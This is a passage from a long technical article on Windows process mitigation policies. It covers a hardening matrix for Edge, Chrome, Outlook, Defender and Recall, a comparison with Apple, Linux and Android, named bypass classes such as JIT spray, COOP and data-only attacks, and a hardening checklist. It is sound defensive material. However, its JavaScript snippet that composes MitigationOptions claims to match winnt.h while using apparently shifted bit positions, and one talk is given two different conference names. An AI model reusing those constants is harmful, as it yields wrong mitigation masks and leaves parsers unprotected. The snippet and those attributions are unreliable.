Causes the process to fault immediately on any use of an invalid handle (use-after-close, double-close, opaque-mismatch) [@ms-setprocessmitigationpolicy]. Handle bugs are an obscure but exploitable class -- a freed kernel object's handle can be reissued, and a process that does not detect this can be tricked into operating on an attacker-controlled replacement. Strict handle checking turns a subtle handle-confusion bug into an immediate crash, before the attacker can pivot.

`ProcessRedirectionTrustPolicy` -- RedirectionGuard

Mitigates symbolic-link, junction, and mount-point confused-deputy attacks. James Forshaw documented the attack family at Project Zero starting in August 2015 with the Windows 10 symbolic-link mitigations post [@p0-forshaw-symlink-2015]. Microsoft shipped the per-process mitigation a decade later, in June 2025 [@msrc-redirectionguard]. RedirectionGuard refuses to traverse a junction if the junction's target was created by a less-trusted user than the process performing the open -- closing the "a low-IL caller plants a junction; a high-IL service follows it" pattern that has been a steady source of local privilege escalation since at least Windows Vista.RedirectionGuard's June 2025 ship date makes it the freshest entry in the PROCESS_MITIGATION_POLICY enum. The MSRC blog states the structural framing in one sentence: "Junctions remain the biggest existing gap. Outside of a sandbox, they can be created by standard users and target any folder on the system" [@msrc-redirectionguard].

`ProcessSideChannelIsolationPolicy`

Two distinct sub-mitigations [@ms-setprocessmitigationpolicy]:

IsolateSecurityDomain -- on context switch, issue IBPB (Indirect Branch Predictor Barrier) and STIBP (Single Thread Indirect Branch Prediction) flushes. This is the per-process Spectre v2 / MDS side-channel mitigation. Performance cost is real, in the 2-5% range on indirect-branch-heavy workloads, and is the reason this policy is opt-in rather than default.
DisablePageCombining -- prevents the kernel from merging identical physical pages across processes. Page-combining is a memory-saving feature that creates a cross-process side-channel: timing the cost of a write to a shared, copy-on-write page leaks whether the page was previously merged with another process's identical page.

`ProcessUserShadowStackPolicy`

The CET-on switch from section 6 [@ms-user-shadow-stack-policy]. Listed here for enum completeness.

`ProcessChildProcessPolicy`

Refuses any CreateProcess call originating from the process [@ms-setprocessmitigationpolicy]. Edge content processes and Chromium renderers enable this. The structural attack class it closes is "renderer is compromised; renderer spawns cmd.exe or powershell.exe and the attacker pivots to a non-sandboxed cousin." With ProcessChildProcessPolicy on, the renderer cannot spawn anything; the attacker has to either bypass within the sandbox or attack the broker process.

`ProcessPayloadRestrictionPolicy` -- EAF / IAF / ROP checks

The mitigations that EMET originally bundled, carried forward into Windows Defender Exploit Guard [@ms-defender-exploit-protection]: Export Address Filter (EAF), Import Address Filter (IAF), ROP-Stack-Pivot, ROP-Caller-Check, ROP-Sim-Exec. Five sub-mitigations that detect heuristic exploit patterns. The honest assessment: these are defense-in-depth against legacy 32-bit binaries that cannot be recompiled with CFG, XFG, or CET. On modern x64 binaries built with /guard:cf /CETCOMPAT, the payload-restriction checks are largely redundant. They remain useful as a backstop for unrecompilable third-party code that runs in a hardened parent process.

`ProcessASLRPolicy` and `ProcessDEPPolicy`

The per-process knobs on top of the system-wide foundations [@ms-setprocessmitigationpolicy]. ProcessASLRPolicy exposes BottomUpRandomization, HighEntropy, ForceRelocateImages, and other refinements -- useful for forcing a paranoid configuration on processes that load third-party DLLs without /DYNAMICBASE. ProcessDEPPolicy is a 32-bit-only vestigial knob; on x64 it does nothing because DEP is unconditionally on.

The other policies

ProcessActivationContextTrustPolicy (restricts manifest-driven activation contexts), ProcessMitigationOptionsMask (a meta-policy returning the mask of supported bits), ProcessSystemCallFilterPolicy (per-process syscall allowlist; rare in production), ProcessUserPointerAuthPolicy (the ARM64-Windows switch for ARM Pointer Authentication, comparatively discussed in section 11), and ProcessSEHOPPolicy (the per-process Structured Exception Handling Overwrite Protection knob -- a Vista-era mitigation predating the modern enum) fill out the enum to twenty-one values. None are individually load-bearing for the article's narrative; they exist for completeness of the kernel ABI.

Twenty policies plus a sentinel. The canonical six handle the control-flow primitives. The other fourteen handle adjacent surfaces. What does it look like when all of these are turned on at once, and which binaries actually do that?

10. What does a maximally hardened modern Windows process look like?

It is one thing to enumerate policies. It is another to ask: who actually turns them on? Where does Microsoft itself enable each one, and what is the structural reason it cannot be enabled on the others?

The fastest way to answer that question is a single matrix. Each column is a binary; each row is a PROCESS_MITIGATION_POLICY value. Each cell is either enabled, or the structural reason it cannot be. The matrix below summarizes the typical Get-ProcessMitigation output for representative binaries, with structural-can't reasons drawn from public Microsoft documentation, Matt Miller's Edge mitigation blog [@miller-acg-blog], and the policy-enum reference [@ms-process-mitigation-enum, @ms-setprocessmitigationpolicy].

Policy	Edge content (`MicrosoftEdgeCP.exe`)	Chrome renderer	Outlook (Office)	Defender (`MsMpEng.exe`)	Recall (Windows AI service)	`Notepad.exe`
DEP / ASLR (system foundation)	yes	yes	yes	yes	yes	yes
CFG	yes	yes	yes	yes	yes	yes
CET shadow stack	yes (strict)	yes	partial	yes	yes (strict)	yes (default)
ACG (`ProcessDynamicCodePolicy`)	yes	yes (with OOP JIT)	no -- COM/MAPI add-ins	no -- engine generates scanner code at runtime	yes	n/a (no JIT)
CIG (`ProcessSignaturePolicy`)	yes (`MicrosoftSignedOnly`)	partial -- plugins	no -- third-party add-ins	yes	yes (`MicrosoftSignedOnly`)	n/a
Disable-Win32k (`SystemCallDisable`)	yes	yes (renderer process)	n/a (GUI)	yes (no GUI)	yes (no GUI)	n/a (GUI)
Disable-Extension-Points	yes	yes	partial	yes	yes	default
Image-Load (all three flags)	yes	yes	partial	yes	yes	default
StrictHandleCheck	yes	yes	yes	yes	yes	yes
ChildProcess	yes	yes	no -- launches `winword`, etc.	yes (no children)	yes (no children)	no
FontDisable	yes	yes	n/a (renders fonts)	n/a	n/a	n/a
RedirectionGuard	yes (since 2025)	yes (since 2025)	partial	yes	yes	partial
SideChannelIsolation	optional	optional	optional	optional	yes (high-trust)	optional
PayloadRestriction (EAF/IAF/ROP)	yes	yes	yes	yes	yes	n/a

The pattern that emerges from this matrix is the article's most important practical observation. The matrix is a threat-model artefact.

For any sandboxed-parser design -- a renderer, a font rasterizer, a PDF previewer, an image decoder -- the structurally-correct policy set is the union of what Edge and Recall enable. Both binaries parse untrusted content from the internet or from local files; both run in isolation; neither needs to load third-party signed DLLs, draw windows, or launch child processes. They can enable the full canonical recipe.

For any extensibility-by-design surface, the policy set is smaller and the threat model has to absorb the gap. Outlook cannot enable CIG because the MAPI plugin model and third-party COM add-ins are an existential product feature. Outlook cannot enable ChildProcess because it launches Word to open attachments. Defender cannot enable ACG because the scanner engine generates emulator bytecode, signature-compilation routines, and regex JITs at runtime -- it is, by design, a JIT for AV signatures, and that JIT runs in MsMpEng.exe. Chromium cannot enable CIG by default because of the third-party plugin model (Widevine, native messaging hosts, accessibility integrations).

Key idea: The canonical 2026 hardened-process recipe is CFG plus CET shadow stack plus ACG plus CIG plus Disable-Win32k plus Disable-Extension-Points plus Image-Load (all three flags) plus StrictHandleCheck plus ChildProcess plus, for parsers, FontDisable, plus RedirectionGuard for filesystem-interacting binaries. Every binary that misses one of these does so for a documentable structural reason -- which is exactly the threat-model artefact the matrix above produces.

This is the recipe the VBS and Trustlets sibling article in this series calls "user-mode hardened." The VBS-isolated Trustlets in the Secure Kernel layer have a separate, complementary surface; see that article for the kernel-side parallel.

Stacking the recipe is the best a 2026 user-mode process can be. But the attacker is still in the room. What survives even a fully-stacked process? What are the bypasses that work after every mitigation is on? Section 12 answers that. First, a quick comparison: what other operating systems do, and what they do differently.

11. What other operating systems do that Windows doesn't

Microsoft is not the only vendor with a per-process mitigation surface. Apple, Linux distributions, Chromium, and ARM-the-vendor are all in the same business, and they have made different structural choices. The honest comparison surfaces where Windows is ahead, where it is behind, and where the gap is not really a gap because the platforms solve slightly different problems.

Apple: Hardened Runtime, ARM PAC, and JIT entitlement. Apple shipped Pointer Authentication Codes (PAC) on the A12 (iPhone XS, September 2018) and on every Mac M1 onward. PAC signs a code pointer with a per-process cryptographic key held in privileged hardware registers, storing the signature in the unused upper bits of a 64-bit pointer. The ARM PACIA, AUTIA, PACIB, and AUTIB instructions sign and verify [@wiki-armv83a]; an unsigned or wrongly-signed pointer dereferenced through a BR/BLR instruction with the AUT variant faults. PAC is structurally stronger than CFG/XFG/CET because the key is held in privileged state and is unforgeable from user mode -- there is no bitmap to lift the validation through.

Apple's JIT entitlement (com.apple.security.cs.allow-jit) is a stronger architectural answer than ACG [@apple-hardened-runtime]. Code that wants to JIT must declare it at build time and is granted a specific in-process W^X carve-out only if the entitlement is signed into the binary's code signature. The result: JIT capability is an attribute of the signed binary rather than a runtime API call, which closes the race-the-mitigation-window class structurally rather than by API migration (UpdateProcThreadAttribute).

Linux: SELinux, landlock, LLVM -fsanitize=kcfi, LLVM -fsanitize=cfi-icall. Forward-edge CFI in the Linux kernel first arrived in version 5.13 (June 2021) as an LTO-based jump-table implementation; the second-generation -fsanitize=kcfi scheme, which places a 32-bit type hash immediately before each function entry and does not require link-time optimization, replaced it in 6.1 (December 2022) [@lwn-corbet-kcfi]. The kCFI design is conceptually very close to XFG, but cheap enough to deploy on a kernel build because it sheds the LTO requirement. LLVM's user-mode -fsanitize=cfi-icall provides per-prototype CFI via jump-table dispatch but still requires LTO [@clang-cfi-doc]. SELinux operates at a different layer of the stack (mandatory access control on filesystem and IPC resources) and is not directly comparable to a control-flow defense -- it constrains what the process can do rather than what control flows the process can follow.

Chromium / V8 sandbox. Chrome enables CFG on Windows, leans on ARM PAC on macOS, and is layering the V8 sandbox on top of all of them [@v8-sandbox-blog]. The V8 sandbox is a Chrome-side software defense: it confines a compromised renderer to a specific bounded memory range, so a renderer-process compromise cannot synthesize pointers to arbitrary out-of-sandbox memory. The V8 sandbox sits inside the renderer (different from the OOP-JIT trust boundary above it) and aims to make even a fully-compromised JIT-output bug non-fatal at the system level.

Android: Scudo allocator and ARM Memory Tagging Extension (MTE). MTE attaches a 4-bit tag to every 16-byte allocation [@arm-mte-newsroom]. The CPU enforces the tag on every pointer dereference: tag mismatch raises a synchronous exception. Pixel 8 (October 2023) was the first consumer device with MTE-default-on for the kernel and key system services [@arm-mte-newsroom]. MTE catches the cause (use-after-free, linear overflow into the next allocation) rather than the symptom (control-flow hijack). It is conceptually orthogonal to CFI. The hard part is perf cost on memory-tagged loads, meaningful enough that even Apple has not enabled MTE on iOS as of 2026.

Platform	Forward-edge	Backward-edge	Dynamic code	Memory safety
Windows (x64)	CFG (coarse), XFG (deprecated)	CET shadow stack	ACG	none structural
Apple (ARM64)	PAC (cryptographic, per-process key)	PAC (signs return addresses too)	JIT entitlement (declarative)	none structural
Linux kernel	`-fsanitize=kcfi` (LLVM 6.1+)	shadow stack on x86 CET; PAC-RA on ARM	not a kernel issue	Rust-in-kernel pilot
Android	PAC + BTI on supported SoCs	BTI / shadow call stack	sandboxed by selinux + seccomp	MTE on Pixel 8
Chromium	per-platform forward-edge	per-platform backward-edge	OOP JIT + V8 sandbox	layered

The honest accounting:

ARM PAC plus MTE is structurally stronger than CFG plus CET, because the cryptographic key (PAC) and the tag (MTE) are CPU-enforced state that no user-mode primitive can forge.
Apple's JIT entitlement is a stronger architectural answer than ACG because it is declarative at signing time rather than imperative at process startup.
SELinux/landlock is at a different layer (data access control) and is not directly comparable -- it solves a different problem.
Windows's mitigation surface is the most extensively deployed and most frequently extended per-process surface in industry use, by a wide margin. Twenty actual policies is more than any other vendor exposes to applications, and the API is stable, documented, and ABI-compatible across Windows versions back to Windows 8.

MTE catches what CFI cannot. A use-after-free that produces a controllable write -- but never violates the control-flow graph -- is invisible to CFG, XFG, CET, and PAC, but raises an MTE tag-mismatch fault on the very first attacker-controlled dereference. This is the structural reason memory-tagging is the emerging frontier and the structural reason a Windows-on-ARM-with-MTE future would close attack classes the current per-process surface cannot reach.

Stronger primitives exist on competing platforms. But Microsoft's per-process surface is the most extensively-deployed and most-frequently-extended in industry use. The bypasses are what tell us where the surface still leaks.

12. How attackers respond to a fully hardened process

Every generation of Windows mitigation has shipped with a named bypass within a year of its release. Here is the tradition, one named class per defensive generation.

Signed-DLL injection. Predates CIG. Find a Microsoft-signed DLL with a controllable side effect -- a DLL-search-order hijack against a signed Windows component, an Authenticode-padding write (CVE-2013-3900 family), or a signed driver with a known IOCTL privilege primitive. CIG sees a valid Microsoft signature and lets the DLL load. The mitigation is reactive: Microsoft's App Control / WDAC blocklist and the Driver Block List enumerate hundreds of banned-but-signed binaries; the list grows every quarter; the attacker's job is to find one not yet on it. This is one of the unsolved problems section 14 names.

JIT spray as a CFG bypass (Theori, 2016). The canonical writeup is Theori's Chakra JIT CFG Bypass [@theori-chakra-cfg-bypass]. The page itself states verbatim that the bypass targeted Microsoft Security Bulletin MS16-119 (October 2016) -- a Chakra fix that tightened the JIT's emit pattern. The technique: persuade the Chakra JIT to emit attacker-chosen byte sequences inside JIT-allocated code pages, at addresses the attacker has marked as valid CFG targets via the SetProcessValidCallTargets carve-out. The MS16-119 patch shrank the set of byte sequences a JavaScript program could induce the JIT to emit, but did not eliminate the technique structurally -- the structural fix was ACG (move the JIT out of process), section 8.

An exploitation technique in which an attacker writes JavaScript (or another JIT-targeted language) that causes the runtime JIT compiler to emit a long sequence of executable bytes at predictable addresses, where some of those emitted bytes form a useful gadget chain when reinterpreted at an offset. The classic JIT spray (Dion Blazakis, BHDC 2010) used Adobe Flash's ActionScript JIT. The 2016 Theori work generalised the idea to use the JIT to emit *CFG-valid* function-entry bytes [@theori-chakra-cfg-bypass].

COOP -- code-reuse without a single CFG-invalid call. Discussed in section 5; recapped here as the first bypass class against coarse-grained forward-edge CFI [@coop-ieeesecurity-pdf]. The structural fix is fine-grained CFI: XFG, which Microsoft did not enforce by default and has since deprecated; LLVM's -fsanitize=cfi-icall and -fsanitize=kcfi; ARM PAC. The per-prototype hash check that XFG would have provided is exactly the property that closes COOP.

Race-the-mitigation-window (Forshaw + Fratric, 2017). Discussed in section 8; recapped here. The structural fix is UpdateProcThreadAttribute(PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY), which installs mitigation policies by the kernel at CreateProcess time, before any user-mode code in the child runs. The race window between CreateProcess return and the child's SetProcessMitigationPolicy call is structurally closed. Documented in the Project Zero issue [@p0-issue-42450607] and the Exploit-DB mirror [@exploit-db-44467].

The CET-bypass research direction (McGarr, 2025). Connor McGarr's Black Hat USA 2025 deck Out of Control names the live research front: kCFG and kCET in the Windows kernel [@mcgarr-bhusa25]. The deck enumerates bypass classes that survive both kernel-mode CFG and kernel-mode CET: page-table modification of the kCFG bitmap (requires kernel write primitives the attacker may already have), abuse of unprotected global function-pointer arrays, structural limits of CET when the attacker is operating with kernel privileges in the first place. The user-mode mitigation surface is mature; the kernel-mode surface is where the live work happens. Hypervisor-Protected Code Integrity (HVCI) is what makes kCFG bitmap mutations harder -- the bitmap is in VTL1, and a VTL0 kernel write cannot touch it -- which is the cross-link to the VBS/Trustlets sibling article in this series.

Cross-context PAC oracles (Apple). Listed for comparative completeness. PAC's per-process key is forgeable if an attacker can call into a function that signs an attacker-controlled pointer with the per-process key and then read the result. This is a known research class on Apple platforms and has produced several CVEs against Safari and iOS over the past five years.

The honest summary is that three classes of bypass survive a fully-stacked user-mode process today:

Signed-but-vulnerable DLL hijack -- defeats CIG by definition (publisher check, not content check).
COOP-style chains where the prototypes match the call site -- defeats CFG (coarse-grained) and is not closed by CET because the call/return invariant holds.
Data-only attacks -- which never violate any control-flow invariant at all, because no control transfer is hijacked.

What is the theoretical limit on what process mitigations can do? That is the next section.

13. What process mitigations cannot do

The Abadi paper that founded CFI in 2005 [@msr-cfi] is also the paper that establishes CFI's structural ceiling. CFI is, by construction, a control-flow property. That is exactly the property a sophisticated attacker can avoid violating.

The formal claim from Abadi, Budiu, Erlingsson, and Ligatti: enforcement of CFI restricts an attacker to control-flow transfers that respect the static call graph. The paper does not say every reachable program behavior is benign. CFI says "the attacker's control flow stays inside the legal CFG." It does not say "the legal CFG is benign." Any attack that operates entirely within the legal CFG is invisible to any CFI variant, including CFG, XFG, CET, PAC, and kCFI.

The lower bound on what an attacker can do while staying inside the legal CFG is given by data-oriented programming. The canonical paper is Data-Oriented Programming: On the Expressiveness of Non-Control Data Attacks by Hong Hu, Shweta Shinde, Sendroiu Adrian, Zheng Leong Chua, Prateek Saxena, and Zhenkai Liang, all of the National University of Singapore Department of Computer Science [@dop-paper]. The abstract is constructive and devastating: "such attacks are Turing-complete. We present a systematic technique called data-oriented programming (DOP) to construct expressive non-control data exploits."

An exploitation technique in which the attacker corrupts non-control data -- authentication flags, length fields, function-table indices, loop bounds -- and lets the program's own legitimate, unmodified control flow execute the attacker's intended computation. Hu, Shinde, Adrian, Chua, Saxena, and Liang proved DOP is Turing-complete: any computation can be expressed as a chain of data-only corruptions in a sufficiently-large program [@dop-paper]. No CFI variant -- CFG, XFG, CET shadow stack, ARM PAC, kCFI -- can detect a DOP attack, because no control flow is hijacked.

The mechanism: the attacker corrupts a current_user.is_admin flag rather than redirecting a function pointer. They corrupt a buffer_len field to enable a subsequent legitimate write past the allocation's intended end. They corrupt a next_state index to drive a state machine through an attacker-chosen path. The program's own logic, executing every instruction the compiler emitted and following every control transfer the static call graph allows, performs the attack. DOP is, in a precise sense, the program working as designed -- on data the attacker has chosen.

A second structural limit: process mitigations are per-process. The kernel has a parallel mitigation surface (kCFG, kCET, HVCI, Secure Kernel, the VBS/Trustlets stack) the per-process policies do not touch [@mcgarr-bhusa25]. The user-mode hardening recipe stops at the syscall boundary. Everything beyond is the kernel's job. A renderer that is fully hardened can still be the entry point for a kernel privilege escalation if a syscall takes attacker-controlled input and the kernel-side code path has its own bug.

The third structural limit is the most uncomfortable to state.

Key idea: Process mitigations harden the exploit chain. They do not fix the bug. The C/C++ memory-safety bug is still there; mitigations just constrain what the attacker can do with it.

Matt Miller, then a senior security engineer at the Microsoft Security Response Center, said this in his Black Hat IL 2019 talk. The deck is on GitHub at the Microsoft MSRC Security Research repository, with the load-bearing slide preserved verbatim [@miller-bhil-pdf]:

~70% of the vulnerabilities addressed through a security update each year continue to be memory safety issues. -- Matt Miller, BlueHat IL 2019 [@miller-bhil-pdf]

ZDNet's contemporaneous coverage extended the claim: "around 70 percent of all the vulnerabilities in Microsoft products addressed through a security update each year are memory safety issues; a Microsoft engineer revealed last week at a security conference; over the last 12 years, around 70 percent of all Microsoft patches were fixes for memory safety bugs" [@zdnet-70percent].

Seventy percent. For a decade. The mitigations in this article -- CFG, XFG, CET, ACG, CIG, every smaller policy in the enum -- exist precisely because that number was not going down. Each generation raises the cost of weaponizing a memory-safety bug into a working exploit. None of them reduces the rate at which memory-safety bugs are introduced into the codebase in the first place.

For the kernel-mode side -- kCFG, kCET, HVCI, and the Trustlets that execute in the Virtual Trust Level 1 (VTL1) Secure Kernel layer -- see the *VBS and Trustlets* sibling article in this series. The user-mode and kernel-mode mitigation surfaces are designed to compose: a renderer hardened to the canonical recipe in section 10, syscalling into a kernel hardened with kCFG and kCET, and protected by an HVCI hypervisor, is the layered defense Microsoft's strategic direction since 2014 has been building toward.

The only ceiling-breaker is to replace the language (so the bug never exists) or to replace the memory model (so the bug cannot be turned into a primitive). The two long-term answers are: memory-safe systems languages, principally Rust (Microsoft has been publicly committing to Rust in Windows since 2019 [@msrc-rust-2019]); and capability-hardware platforms like CHERI and ARM MTE, which catch the bug at the dereference rather than the chain.

Three things have to be true for mitigations to keep buying time:

Each new mitigation closes a specific attack class -- which means a specific bypass class becomes the next research front.
Each new bypass class must take an attacker longer to develop than it takes Microsoft to ship the next mitigation -- otherwise the curve goes the wrong way.
The fraction of memory-safety bugs in shipped code has to either stop rising or start falling -- otherwise no number of mitigations stacks fast enough.

Mitigations are a delaying action. The long-term answer is somewhere else. The reader's belief at this point is no longer "stack enough mitigations and we win." It is "mitigations have a structural ceiling, and the bug is still there." If process mitigations have a ceiling, what is Microsoft pivoting toward, and what is the open frontier?

14. Open problems

Six things are still unsolved -- or, more precisely, six things are partially solved in ways that are documented but visibly imperfect.

1. Forward-edge CFI without recompilation. Binary-rewriting CFI (BinCFI, Mocfi, Lockdown) is not production-grade on Windows. Microsoft's strategic answer is "recompile first-party code with /guard:cf and accept that legacy third-party binaries remain unguarded." That answer is a long-tail problem: the surface of legacy third-party DLLs that load into hardened Windows processes (drivers, COM components, accessibility tools) is large, slow to recompile, and outside Microsoft's direct control.

2. Backward-edge protection on pre-CET hardware. Microsoft's pre-CET internal experiment was Return Flow Guard (RFG), a software-implemented per-thread shadow stack maintained by the runtime rather than the CPU. Tencent Xuanwu Lab bypasses came faster than Microsoft could harden RFG [@wiki-cfi]; Microsoft pivoted to wait for Intel CET. Pre-Tiger-Lake (pre-September-2020) Intel hardware and pre-Zen-3 (pre-November-2020) AMD hardware remain unprotected on the backward edge. Enterprises that need backward-edge protection on older hardware have to sandbox in VBS-isolated VMs -- cross-link to the VBS/Trustlets sibling article.

3. The JIT-engine compatibility tax under ACG. Out-of-process JIT adds roughly a millisecond per JIT compilation for the IPC round-trip. For short-lived JavaScript (lots of small functions, one-shot pages, ad-network microservices), this is significant. Chrome's V8 sandbox project (active since 2023) confines the JIT process to a sandboxed memory range of the renderer's address space, which closes the IPC-level attack class but does not erase the perf cost [@v8-sandbox-blog]. Interpreter-only renderers for low-trust contexts (small pages, ad iframes) are the medium-term direction; the cost is the runtime perf gap to fully-jitted JS.

4. ACG plus AV interoperability. Defender's MsMpEng.exe cannot enable ACG. The scanner engine generates code at runtime: signature compilation routines, emulator bytecode, regex JITs. Migration to interpreted bytecode is partial. This is a permanent compatibility tension between W^X-as-process-invariant and runtime-generated-code-as-a-feature, and it shows up in every AV engine across every vendor (CrowdStrike Falcon, SentinelOne, Symantec), not just Defender.

5. Signed-but-vulnerable Microsoft DLLs as universal CIG-bypass loaders. The Microsoft-signed DLL surface is enormous and historically full of side-effect DLLs. The App Control / WDAC blocklist is reactive. The blocklist publishes quarterly. New signed-but-vulnerable DLLs are found every quarter. This is a permanent residual risk against CIG and the structural reason vendors with sensitive workloads sometimes run with MitigationOptIn plus a per-process allowlist rather than MicrosoftSignedOnly plus an unbounded universe.

6. XFG default-on tradeoffs. XFG's instrumentation is in the MSVC binaries; the dispatch thunks are in ntdll.dll. Enforcement-by-default never shipped. McGarr's BHUSA 2025 deck names XFG as "deprecated" [@mcgarr-bhusa25]; Microsoft's strategic direction is hardware-backed CFI (CET shadow stack for the backward edge) plus KCFG / KCET in the kernel. The unsolved question is whether the forward edge can ever get fine-grained protection without the compatibility cost that killed XFG. Apple's PAC suggests yes (because the cryptographic key approach has zero compatibility cost on cast); LLVM's -fsanitize=cfi-icall suggests yes for code built end-to-end with LTO. Neither has a Windows analog as of 2026.

Recompile first-party code with `/guard:cf /CETCOMPAT`. Push the kernel hardening (kCFG, kCET, HVCI) forward, since the user-mode surface is mature. Lean on hardware (Intel CET, AMD shadow stack, eventually MTE-on-Windows-on-ARM) rather than software heuristics. Accept that legacy unrecompiled binaries remain unguarded and quarantine them in lower-trust VBS-isolated contexts. That is the strategy McGarr's 2025 deck implies and that the Defender / Edge / Recall configurations in the section 10 matrix execute [@mcgarr-bhusa25].

Six open problems. The first four are engineering. The last two are structural. The structural ones suggest the next-decade answer is not a better mitigation, but a different memory model: Rust, CHERI, MTE.

15. Practical guide: ten steps to ship a hardened binary

Concrete. Ten steps. By the end of this checklist, your new sandboxed-parser binary is hardened to the canonical 2026 recipe.

Run dumpbin /headers /loadconfig YourBinary.exe. Verify the Guard Flags word is non-zero, that FID Table present is in the output, and that the Guard CF Function Table is non-empty [@ms-cfg-doc].
Compile and link with: /guard:cf /guard:cfw /CETCOMPAT /DYNAMICBASE /HIGHENTROPYVA /NXCOMPAT. The /CETCOMPAT flag requires Visual Studio 2019 or later and x64 only [@ms-guard-cf-compiler, @ms-guard-cf-linker, @ms-cetcompat].
Call SetProcessMitigationPolicy (or, better, UpdateProcThreadAttribute(PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY) for child processes) for: ProcessDynamicCodePolicy, ProcessExtensionPointDisablePolicy, ProcessImageLoadPolicy (with NoRemoteImages plus NoLowMandatoryLabelImages plus PreferSystem32Images), ProcessStrictHandleCheckPolicy, ProcessSystemCallDisablePolicy (if your process does not draw windows), and ProcessUserShadowStackPolicy (with EnableUserShadowStack and, for the most-hardened sandboxes, BlockNonCetBinaries) [@ms-setprocessmitigationpolicy, @ms-dynamic-code-policy, @ms-image-load-policy, @ms-user-shadow-stack-policy].
Use UpdateProcThreadAttribute(PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY) rather than post-CreateProcess policy installation for any child process. This is the single most important step on this list.
Audit with Set-ProcessMitigation -PolicyFilePath (Group Policy / Intune deployable XML). The schema and the cmdlet are documented in the Defender Exploit Protection reference [@ms-defender-exploit-protection].
For sandboxed parsers (PDF, image, video, font), enable ProcessFontDisablePolicy. Refuse non-system fonts at the per-process layer.
For signed-component-only processes, enable ProcessSignaturePolicy(MicrosoftSignedOnly). Accept that some third-party DLLs will not load and document each gap in your threat model [@ms-binary-signature-policy].
For browser-class sandboxed children, prohibit child-process creation with ProcessChildProcessPolicy. Closes the renderer-to-cmd.exe pivot class.
Validate the rendered policy at runtime with Get-ProcessMitigation -Name <binary>. Spot-check that every flag you set in code is reflected in the cmdlet output [@ms-defender-exploit-protection].
For each policy you cannot enable, document the structural reason in your threat model. A binary that misses CIG because it depends on third-party COM add-ins is making a deliberate threat-model choice; that choice must be visible to the security review.

Note: UpdateProcThreadAttribute(PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY) closes the race-the-mitigation-window class structurally (section 8, section 12). Every other step on this list is a useful addition. Step 4 is the load-bearing step that lets every other step work as designed. Without it, a peer process in the same security context can disable any of the others between CreateProcess and the child's first attempt to install its policies.

The composition of the policy bitfield itself is mechanical. Each policy is a small DWORD-sized structure; the mitigation-policy attribute for UpdateProcThreadAttribute packs the relevant flags into a 64-bit MitigationOptions value plus an optional 64-bit MitigationAuditOptions value.

Run this in an elevated PowerShell session, replacing `msedge.exe` with the basename of your binary:

Get-ProcessMitigation -Name msedge.exe |
  Format-List CFG, CETShadowStack, BinarySignature, DynamicCode,
              ExtensionPoint, ImageLoad, StrictHandle, SystemCall,
              ChildProcess, FontDisable, PayloadRestriction,
              SideChannelIsolation, ASLR, DEP

Each block in the output shows Enable, Audit, and the subordinate flag word with its individual boolean fields. Spot-check that every flag your code sets in SetProcessMitigationPolicy is reflected as ON in the cmdlet output, and that any OFF or NOTSET cell has a documented structural reason in your threat model [@ms-defender-exploit-protection].

{` // Each name is documented in PROCESS_CREATION_MITIGATION_POLICY_* constants // in winnt.h. The bit positions below match the Microsoft Learn reference. const POL = { // First DWORD: legacy mitigations 'DEP_ENABLE': 0x01n << 0n, 'DEP_ATL_THUNK_ENABLE': 0x01n << 1n, 'SEHOP_ENABLE': 0x01n << 2n, 'FORCE_RELOCATE_IMAGES_ALWAYS_ON':0x01n << 8n, 'HEAP_TERMINATE_ALWAYS_ON': 0x01n << 12n, 'BOTTOM_UP_ASLR_ALWAYS_ON': 0x01n << 16n, 'HIGH_ENTROPY_ASLR_ALWAYS_ON': 0x01n << 20n, // Second DWORD: modern mitigations (packed at +32) 'STRICT_HANDLE_CHECKS_ALWAYS_ON': 0x01n << 32n, 'WIN32K_SYSTEM_CALL_DISABLE_ALWAYS_ON': 0x01n << 36n, 'EXTENSION_POINT_DISABLE_ALWAYS_ON': 0x01n << 40n, 'PROHIBIT_DYNAMIC_CODE_ALWAYS_ON': 0x01n << 44n, 'CONTROL_FLOW_GUARD_ALWAYS_ON': 0x01n << 48n, 'BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON': 0x01n << 52n, 'FONT_DISABLE_ALWAYS_ON': 0x01n << 56n, 'IMAGE_LOAD_NO_REMOTE_ALWAYS_ON': 0x01n << 60n, };

// Compose the recipe for a sandboxed PDF parser const enabled = [ 'DEP_ENABLE', 'BOTTOM_UP_ASLR_ALWAYS_ON', 'HIGH_ENTROPY_ASLR_ALWAYS_ON', 'STRICT_HANDLE_CHECKS_ALWAYS_ON', 'WIN32K_SYSTEM_CALL_DISABLE_ALWAYS_ON', 'EXTENSION_POINT_DISABLE_ALWAYS_ON', 'PROHIBIT_DYNAMIC_CODE_ALWAYS_ON', 'CONTROL_FLOW_GUARD_ALWAYS_ON', 'BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON', 'FONT_DISABLE_ALWAYS_ON', 'IMAGE_LOAD_NO_REMOTE_ALWAYS_ON', ];

let options = 0n; for (const name of enabled) options |= POL[name]; console.log('MitigationOptions = 0x' + options.toString(16).padStart(16, '0')); console.log('Policies enabled: ' + enabled.length + ' of ' + Object.keys(POL).length); `}

Stack the recipe. Document the gaps. Watch the FAQ below for the common misconceptions you will hit on the way.

16. Frequently asked questions

On x64 Windows, DEP is unconditionally on for all processes. `ProcessDEPPolicy` in `SetProcessMitigationPolicy` is a 32-bit-only vestigial knob, retained because some 32-bit legacy code is still in production [@ms-setprocessmitigationpolicy]. For new code on x64, you do not need to touch the DEP policy; the only useful per-process refinement is `ProcessASLRPolicy` (specifically `ForceRelocateImages` and `HighEntropy`), to insist on high-entropy randomization even when third-party DLLs were built without `/DYNAMICBASE`. No. They attack different surfaces. CIG (`ProcessSignaturePolicy`) prohibits *loading unsigned images*. ACG (`ProcessDynamicCodePolicy`) prohibits *generating new executable code at runtime*. An attacker who finds a signed-but-vulnerable DLL bypasses CIG but does not bypass ACG. An attacker who finds a JIT-spray primitive in an in-process JIT bypasses ACG but does not bypass CIG (because they are not loading a new DLL). The two are orthogonal, and a hardened process needs both [@miller-acg-blog, @ms-binary-signature-policy, @ms-dynamic-code-policy]. No. The MSVC `/guard:xfg` flag exists. The `__guard_xfg_dispatch_icall_fptr` thunk exists in `ntdll.dll`. The instrumentation is in some binaries. Enforcement-by-default never shipped, and Connor McGarr's Black Hat USA 2025 deck describes XFG as "deprecated" [@mcgarr-bhusa25]. Microsoft's strategic direction is hardware-backed CET shadow stack for the backward edge 